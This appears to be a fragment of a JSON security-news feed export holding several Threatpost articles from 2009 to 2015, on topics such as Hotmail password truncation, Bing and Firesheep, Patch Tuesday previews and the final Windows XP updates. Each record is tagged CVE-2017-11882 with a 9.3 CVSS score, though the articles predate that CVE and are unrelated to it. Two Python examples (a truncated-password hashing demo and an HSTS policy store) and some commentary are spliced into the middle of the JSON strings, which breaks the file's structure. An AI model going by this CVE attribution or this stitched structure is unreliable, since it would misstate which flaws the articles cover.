\n", "cvss3": {}, "published": "2010-04-29T17:12:54", "type": "threatpost", "title": "New Flaw Found in Microsoft SharePoint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:53:17", "id": "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "href": "https://threatpost.com/new-flaw-found-microsoft-sharepoint-042910/73898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:13", "description": "[](<https://threatpost.com/hotmail-limits-passwords-16-characters-092112/>)Passwords, unfortunately, still are the main authentication mechanism on most Web sites, including all of the popular webmail services, such as Hotmail, Gmail and Yahoo Mail. Many sites encourage users to pick complex and long passwords, so it\u2019s surprising to see that Microsoft now has limited Hotmail passwords to no more than 16 characters. Even more surprising, however, is that Hotmail will accept the first 16 characters of an existing, longer password, indicating that the company may have been storing users\u2019 passwords in plaintext.\n\nMicrosoft officials say that there has been a 16-character limit for Hotmail accounts for some time. But security researchers who looked at the requirement found it odd, to say the least. Sixteen characters is a somewhat arbitrary limit, but the more interesting bit is why Microsoft chose to make the change at all.\n\nThe real question, however, is what the implications of the change are. As [Costin Raiu](<https://www.securelist.com/en/blog/208193844/Hotmail_Your_password_was_too_long_so_we_fixed_it_for_you>), head of Kaspersky Lab\u2019s GReAT research team, wrote in an analysis of the issue, one possibility is that Microsoft has been truncating longer passwords to 16 characters all along and then hashing those first 16 characters. 
The other possibility is somewhat more troubling.\n\n\u201cMy previous password has been around 30 chars in size and now, it doesn\u2019t work anymore. However, I could login by typing just the first 16 chars,\u201d he wrote.\n\n\u201cTo pull this trick with older passwords, Microsoft had two choices:\n\n* store full plaintext passwords in their db; compare the first 16 chars only \n* calculate the hash only on the first 16; ignore the rest\n\nStoring plaintext passwords for online services is a definite no-no in security. The other choice could mean that since its inception, Hotmail was silently using only the first 16 chars of the password. To be honest, I\u2019m not sure which one is worse.\u201d\n\nMicrosoft officials did not respond to questions on this issue.\n\nTo avoid keeping passwords in recoverable form, many Web sites run users\u2019 plaintext passwords through a hash function and store only the result. Depending upon which hash function is being used, and what kind of hardware is used to do the cracking, the length of time needed to crack a password hash can vary greatly. \n\n\u201cPlease note our research has shown uniqueness is more important than length and (like all major account systems) we see criminals attempt to victimize our customers in various ways; however, while we agree that in general longer is better, we\u2019ve found the vast majority of attacks are through phishing, malware infected machines and the reuse of passwords on third-party sites \u2013 none of which are helped by very long passwords,\u201d a Microsoft spokesman said. \n\n\u201cSixteen characters has been the limit for years now. We will always prioritize the protection needs of users\u2019 accounts and we will continue to monitor the new ways hijackers and spammers attempt to compromise accounts, and we design innovative features based on this. 
At this time, we encourage customers to frequently reset their Microsoft account passwords and use unique passwords that are different from other services.\u201d\n\n_This story was updated on Sept. 24 to add a comment from Microsoft._\n", "cvss3": {}, "published": "2012-09-21T17:59:05", "type": "threatpost", "title": "Hotmail Limits Passwords to 16 Characters", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:29", "id": "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "href": "https://threatpost.com/hotmail-limits-passwords-16-characters-092112/77038/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy settings for the next version of its search engine. Currently the site strips SSL when forced onto HTTPS and, in turn, browsers display a warning signaling an unsafe connection.\n\n[Introduced at Toorcon, the Firesheep Firefox extension](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>) allows attackers to capture site cookies from users on unsecured wireless networks and browse under their logon. \n\nWith the advent of Firesheep and, subsequently, its surge of recently converted hackers, HTTP session hijacking is becoming more and more of a concern. Sites like Bing will have to adopt suitable security techniques to contend with the extension\u2019s further proliferation. \n\nFirefox 4, scheduled for release by the end of the year, will help. [As reported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport Security, which makes it connect only over HTTPS to sites that have opted in by sending the Strict-Transport-Security header. 
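Raiu's two explanations in the Hotmail item above are easy to tell apart from the outside and easy to get wrong on the inside. The following is an added example, not Kaspersky's or Microsoft's code: two toy credential stores, one hashing only the first 16 characters of the password and one hashing all of it, and a client-side probe that logs in with successively longer prefixes of a password you own. The PBKDF2 work factor, the user name and the 31-character password are assumptions made for the example.

```python
"""Truncate-then-hash versus hash-the-whole-password, plus a black-box probe for truncation.

Added example; the stores are toys and the work factor is deliberately low so the probe runs quickly.
"""
import hashlib
import hmac
import os

ITERATIONS = 20_000  # assumption for the example; use a real password KDF and work factor in production


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


class TruncatingStore:
    """Raiu's second explanation: only the first `limit` characters ever reach the hash."""

    def __init__(self, limit=16):
        self.limit = limit
        self._db = {}

    def register(self, user, password):
        salt = os.urandom(16)
        self._db[user] = (salt, _derive(password[: self.limit], salt))

    def login(self, user, password):
        salt, digest = self._db[user]
        return hmac.compare_digest(digest, _derive(password[: self.limit], salt))


class FullLengthStore:
    """Every character of the password is part of the hash input; no proper prefix verifies."""

    def __init__(self):
        self._db = {}

    def register(self, user, password):
        salt = os.urandom(16)
        self._db[user] = (salt, _derive(password, salt))

    def login(self, user, password):
        salt, digest = self._db[user]
        return hmac.compare_digest(digest, _derive(password, salt))


def shortest_accepted_prefix(login, full_password):
    """Client-side probe needing no database access: try each proper prefix of a password you own.
    If any one logs you in, the service is either hashing a truncated password or comparing
    plaintext prefixes; returns that length, or None if only the full password works."""
    for n in range(1, len(full_password)):
        if login(full_password[:n]):
            return n
    return None


def demo():
    password = "correct horse battery staple 42"  # 31 characters, constructed for the example
    truncating, full = TruncatingStore(limit=16), FullLengthStore()
    truncating.register("alice", password)
    full.register("alice", password)
    return {
        "truncating": shortest_accepted_prefix(lambda p: truncating.login("alice", p), password),
        "full_length": shortest_accepted_prefix(lambda p: full.login("alice", p), password),
    }


if __name__ == "__main__":
    print(demo())  # the truncating store accepts a 16-character prefix; the full-length store accepts none
```

The probe cannot tell truncate-then-hash from a plaintext prefix comparison; both answer 16 here. What it does show is that the effective secret on such a service is the 16-character prefix, whatever the user typed.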
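The paragraph above compresses what HTTP Strict Transport Security does. The following is an added example, not Mozilla's or Bing's code: a minimal policy store that records a Strict-Transport-Security header only when it arrived over HTTPS (the rule in RFC 6797, so an on-path attacker on plain HTTP cannot plant or clear policies), honours max-age, includeSubDomains and max-age=0, and rewrites http:// URLs for covered hosts. The host names and timestamps are constructed.

```python
"""Minimal HSTS policy store: parse Strict-Transport-Security and upgrade http:// URLs accordingly.

Added example; host names are assumptions. `now` is passed in as seconds so expiry is testable.
"""
from urllib.parse import urlsplit, urlunsplit


class HstsStore:
    def __init__(self):
        self._policies = {}  # host -> (expires_at, include_subdomains)

    def observe(self, url, header, now):
        """Record the policy carried by a response. The header is ignored unless the response came
        over HTTPS, max-age is mandatory, and max-age=0 removes an existing entry."""
        parts = urlsplit(url)
        if parts.scheme != "https" or not parts.hostname:
            return False
        max_age, include_sub = None, False
        for directive in header.split(";"):
            name, _, value = directive.strip().partition("=")
            name = name.strip().lower()
            if name == "max-age":
                try:
                    max_age = int(value.strip().strip('"'))
                except ValueError:
                    return False
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None or max_age < 0:
            return False
        host = parts.hostname.lower()
        if max_age == 0:
            self._policies.pop(host, None)
        else:
            self._policies[host] = (now + max_age, include_sub)
        return True

    def upgrade(self, url, now):
        """Return the https:// form of an http:// URL when a live policy covers its host, by exact
        match or via a parent domain that set includeSubDomains; otherwise return it unchanged."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not parts.hostname:
            return url
        host = parts.hostname.lower()
        labels = host.split(".")
        for i in range(len(labels)):
            policy = self._policies.get(".".join(labels[i:]))
            if policy is None:
                continue
            expires_at, include_sub = policy
            if now >= expires_at:
                continue  # stale entry, no longer enforced
            if i == 0 or include_sub:
                netloc = host if parts.port in (None, 80) else f"{host}:{parts.port}"
                return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))
        return url


if __name__ == "__main__":
    store = HstsStore()
    store.observe("https://bing.example/", "max-age=31536000; includeSubDomains", now=1000)
    print(store.upgrade("http://www.bing.example/search?q=x", now=2000))
```

The store is what the browser keeps; it does nothing for a site that never served the header, which is the point the article's closing paragraph makes about Bing.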
\nHowever, if sites like Bing don\u2019t offer SSL at all, HSTS has nothing to enforce: the lack of end-to-end encryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network World has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:41", "description": "Microsoft has announced it will issue nine bulletins for its July Patch Tuesday release next week. Included in the update are three critical patches for security holes that, if left unaddressed, could result in remote code execution on vulnerable systems.\n\nIn all, the Redmond, Washington company will address 16 vulnerabilities in Microsoft Windows, Internet Explorer, Microsoft Office, and the Server Software and Developer Tools products. The bulk of the releases \u2013 six updates \u2013 are rated \u201cimportant\u201d by Microsoft, which suggests they could be used to compromise systems, but not by self-spreading malware. Most deal with elevation of privilege vulnerabilities. \n\nMicrosoft hasn\u2019t said what vulnerabilities the patches will address. However, it is possible that at least one of the patches will fix a hole in Microsoft\u2019s XML Core Services. 
The vulnerability, [disclosed in mid-June](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>), allows remote code execution through Internet Explorer and is being actively exploited.\n\nHere\u2019s a rundown of the bulletins:\n\nBulletin ID | Maximum Severity Rating and Vulnerability Impact | Restart Requirement | Affected Software \n---|---|---|--- \nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | May require restart | Microsoft Windows \nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | Requires restart | Microsoft Windows, Internet Explorer \nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | May require restart | Microsoft Windows \nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | May require restart | Microsoft Office, Microsoft Developer Tools \nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Elevation of Privilege | Requires restart | Microsoft Windows \nBulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Remote Code Execution | Requires restart | Microsoft Windows \nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Information Disclosure | Requires restart | Microsoft Windows \nBulletin 8 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Elevation of Privilege | May require restart | Microsoft Office, Microsoft Server Software \nBulletin 9 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>), Elevation of Privilege | Does not require restart | Microsoft Office \n\nThis is the first monthly patch release to use a new and improved version of Windows Update that fixes a vulnerability previously used by the Flame malware. 
[News broke last month that the malware used a forged Microsoft certificate](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>) to validate its components, impersonating a Windows Update mechanism and installing malicious code in its place.\n\nAs usual, Microsoft will push the patches next Tuesday, July 10, around 1 p.m. EST. Those looking for more information on the updates should read Microsoft\u2019s advance notification on [Technet](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-06T15:03:10", "type": "threatpost", "title": "Microsoft Plans To Fix 16 Vulnerabilities With July Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:54", "id": "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "href": "https://threatpost.com/microsoft-plans-fix-16-vulnerabilities-july-patch-release-070612/76774/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "Database Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. 
Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suite that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This month\u2019s advance notification also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from [October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007 Service Pack 2 and for the 32- and 64-bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003 Service Pack 3, Office XP Service Pack 3 and Office for Mac 2011. 
\n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and affects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday, November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "[As expected](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>), Microsoft issued its final epitaph for Windows XP today, pushing out four security bulletins for 11 vulnerabilities, including the last updates for the oft-maligned, thirteen-year-old operating system.\n\nDespite it being XP\u2019s last gasp from a security standpoint, it\u2019s actually a relatively light batch of [Patch Tuesday updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-apr>) this month. 
Two of the bulletins are branded critical and the other two important, but all of them can lead to remote code execution in their respective software, including recent versions of Word and some versions of Internet Explorer, if left unpatched.\n\nThe first critical patch (MS14-017) fixes a zero day first discovered last month in Microsoft Word. The patch fixes three vulnerabilities in total, chief among them the RTF memory corruption vulnerability that\u2019s been [discussed in depth](<http://threatpost.com/word-zero-day-attacks-use-complex-chain-of-exploits/105002>) over the past month. That bug could open the program up to remote code execution and let an attacker gain administrative rights if a specially crafted RTF file is either opened or previewed in Word or Outlook. [Microsoft first warned about the vulnerability](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) \u2013 first in an advisory last month, then in a Fix-It \u2013 after it discovered limited targeted attacks that used it for a vector in the wild. The exploit for the zero day, rather complex in nature, includes ASLR bypass, ROP techniques and shellcode with multiple mechanisms designed to circumvent analysis. In addition to the memory corruption bug, the patch also fixes two additional vulnerabilities; a file format converter vulnerability in Office and a stack overflow vulnerability in Word.\n\nThe Word issue is the only bug being patched today that\u2019s actively being exploited, so naturally experts are calling it the biggest priority of the four for service administrators.\n\n\u201cThis continues a trend we\u2019ve seen of Office-based exploits being successfully used in targeted attacks over the past few years,\u201d Marc Maiffret, the CTO of BeyondTrust said Tuesday. 
\u201cDeploy this patch as soon as possible to fix vulnerabilities in both Word and Office Web apps.\u201d\n\nThe second critical patch (MS14-018) also fixes a memory corruption bug, six of them to be exact, in most versions (6-9, 11) of Internet Explorer. Much like the Word vulnerability if a user were to stumble upon a malicious webpage an attacker could exploit the bug to execute code on the computer in the context of its current user. This vulnerability is one of two that affect components on XP, including IE 6 for those still running XP\u2019s Service Pack 3 and its Professional x64 Edition Service Pack 2.\n\nA previously disclosed file handling vulnerability (MS14-019) was also fixed by today\u2019s updates that could have allowed remote code execution in Windows. If left unpatched an attacker could trick a user to run a specially crafted .bat or .cmd file and gain command. While still important it\u2019s safe to say this vulnerability may be the least dangerous of today\u2019s patches as a user would have to be tempted to execute a batch file on a malicious network share. 
Still, this is the second issue that could affect users running some outdated versions of XP.\n\nThe last patch (MS14-020) addresses a hole that could open a machine up to remote code execution if someone were to open a specially crafted Microsoft Publisher file.\n\nWhile it may seem minor, Ross Barrett, Senior Manager of Security Engineering at Rapid7, is encouraging any firms that use the software on their system to prioritize the patch.\n\n\u201cI expect anyone who still works with it might actually be gullible enough to click on email attachments of Publisher documents,\u201d Barrett said of the vulnerability on Tuesday.\n\nOn top of the two bulletins that affect XP, both the Publisher issue and the Word issue figure into two bulletins that also affect Microsoft Word 2003, the final four updates for both XP and Office 2003.\n\nIf somehow you missed it, [Microsoft is ending support for XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>), Internet Explorer 6 and Office 2003 today, meaning this month\u2019s patches mark the last time the company will issue security updates for these products. 
While it\u2019s only a scant four bulletins, this makes April\u2019s Patch Tuesday an essential one for those who rely on the outdated platforms and apps.\n\nIt\u2019s assumed many admins are in the process of migrating off of XP \u2013 but it\u2019s likely they\u2019ll continue to have their hands full, not just with today\u2019s updates, but also recent updates from [Google](<http://threatpost.com/google-patches-four-pwn2own-bugs-in-chrome-33/104828>), [Mozilla](<http://threatpost.com/mozilla-patches-pwn2own-zero-days-in-firefox-28/104889>), [Apple](<http://threatpost.com/apple-fixes-more-than-25-flaws-in-safari/105197>) and other companies following last month\u2019s Pwn2Own competition.\n\n[It\u2019s widely expected](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) that a subset of attackers will ramp up exploits targeting XP after today and potentially examine patches for modern Windows 7 and 8 systems and adapt them to now no-longer supported XP machines.\n", "cvss3": {}, "published": "2014-04-08T15:52:10", "type": "threatpost", "title": "April Patch Tuesday Fixes 11 Vulnerabilities, Last Updates for XP", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-11T18:53:10", "id": "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "href": "https://threatpost.com/last-call-for-xp-office-2003-updates-april-patch-tuesday-fixes-11-vulnerabilities/105329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Dennis Fisher talks to Adam Shostack of Microsoft, about the evolution of thinking around \u201cThe New School of Information Security,\u201d his new group blog and what surprised him most when he went to work at Microsoft.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_410.mp3>)\n\nSubscribe to the Digital Underground podcast on 
[****](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [Curious Hands](<http://podsafeaudio.com/jamroom/bands/1309/>).\n", "cvss3": {}, "published": "2009-04-07T13:43:08", "type": "threatpost", "title": "Adam Shostack on the Science of Security and Value of Thinking Differently", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:25:28", "id": "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "href": "https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. 
\n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson.\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. 
Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update failed to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>)_ reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). 
Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post_ article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. 
We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there just simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data available on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. 
Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. 
There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:09", "description": "Microsoft announced today that they will be shipping three critical and five important bulletins in the May edition of patch Tuesday.\n\nAll of the \u2018critical\u2019 bulletins and two of the \u2018important\u2019 bulletins fix vulnerabilities that could otherwise lead to remote code execution. The two remaining \u2018important\u2019 bulletins could lead to an elevation of privilege if unpatched.\n\nThe affected software includes Microsoft Office, Windows, .NET Framework, and Silverlight. 
The bugs that will be fixed this month will affect all of the current versions of Windows.\n\nThe official bulletins will be released on [the TechNet Blog](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) Tuesday, May 8, and Microsoft will host a webcast to discuss the fixes the following day, May 9, at 11 AM PST.\n", "cvss3": {}, "published": "2012-05-03T18:28:56", "type": "threatpost", "title": "Patch Tuesday Advance Notification: May Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "href": "https://threatpost.com/patch-tuesday-advance-notification-may-edition-050312/76522/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates 